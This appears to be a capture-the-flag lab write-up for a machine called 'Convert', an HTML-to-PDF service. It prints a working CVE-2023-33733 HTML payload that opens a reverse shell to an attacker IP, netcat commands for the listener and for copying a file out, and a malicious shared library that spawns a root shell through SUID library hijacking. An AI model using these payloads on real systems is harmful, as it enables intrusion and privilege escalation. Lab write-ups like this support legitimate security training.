Published on

Convert Writeup

Authors
logo

Port Scanning

nmap -sV -sC -p- -v $IP --open

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 60:fc:05:85:35:18:5c:83:ff:aa:85:48:9b:6b:68:80 (ECDSA)
|_  256 4e:88:0d:b1:27:e3:b4:9a:80:93:48:a0:d5:56:d7:2b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Convert HTML to PDF Online
| http-methods:
|_  Supported Methods: OPTIONS GET POST HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

http://172.16.9.251

An application called Convert, which has the functionality to convert HTML files into PDF.

convert

The application has a restriction, allowing only HTML files to be submitted. I tried bypassing the filter but was unsuccessful.

convert 1

After submitting any HTML file, the application converts it to PDF.

After converting, we can use the exiftool tool to identify which tool/library was used for the conversion.

convert 2

With the producer's name in hand, we can check if there is a related CVE.

convert 3

To exploit CVE-2023-33733, we will send a malicious .html file, which will grant us RCE.

https://github.com/c53elyas/CVE-2023-33733

Foot Hold

evil.html

<para>
  <font color="[[[getattr(pow, Word('__globals__'))['os'].system('/bin/bash -c \'sh -i >& /dev/tcp/10.0.31.150/1337 0>&1\'') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
    exploit
  </font>
</para>
convert 4

nc -lnvp 1337

convert 5

Privillege Escalation

find / -perm -u=s 2>/dev/null

convert 6

Upon accessing the binary directory and executing the ucount file, which has the SUID bit set, we notice that it returns the count of system users

convert 7

Using the strace command, we can confirm that the file is using the librunner.so library, which is inside the functions directory.

convert 8

With this, we can use a privilege escalation technique known as Shared Library Hijacking, creating our own librunner.so to be executed by the SUID ucount.

However, we do not have permission to modify librunner.so directly, but since the file is in our user's folder (flaskuser), we can alter it.

mv binary/ binary2
mkdir -p binary/functions
convert 9

Now, we will create our malicious library and place it inside the folder we just created.

To do this, let's transfer the original librunner.so to our machine for further analysis.

#attacker machine
nc -lnvp 1234 > librunner.so
#target machine
nc 10.0.31.150 1234 < librunner.so
convert 10
convert 11

Opening the file in Ghidra, we see a function called isRoot, and we will use it to gain root access to the system.

Edit: Sorry, guys, the screenshot got cut off 😄

convert 12
#include <stdlib.h>
#include <unistd.h>

void isRoot() {
	setuid(0);
	setgid(0);
	system("/bin/bash -i");
}

void lineCounter() {
}

gcc -shared -fPIC -nostartfiles -o librunner.so librunner.c

convert 13

Now, just execute the SUID file located in the directory we created (binary2).

convert 14

Proof

convert 15
Discuss on TwitterView on GitHub